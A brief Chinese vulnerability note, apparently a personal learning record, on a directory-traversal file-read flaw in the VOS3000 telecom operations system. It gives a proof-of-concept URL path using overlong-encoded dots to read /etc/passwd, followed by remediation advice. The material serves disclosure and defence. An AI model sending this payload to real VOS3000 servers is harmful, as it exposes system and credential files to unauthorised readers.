昆石网络 VOS3000虚拟运营支撑系统任意文件读取漏洞

漏洞描述：

昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测，可导致任意文件读取漏洞。

漏洞利用条件:

对⽤户查看或下载的⽂件没有限制或者限制绕过，就可以查看或下载任意⽂件

漏洞影响范围：

VOS3000

漏洞复现：

1.Poc:/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

 

修复建议：

1、对用户输入的参数进行校验；
2、限定用户访问的文件范围；
3、使用白名单；
4、过滤…/，防止用户进行目录遍历；
5、文件映射，存储和应用分离。

学习记录过程仅供参考！！！！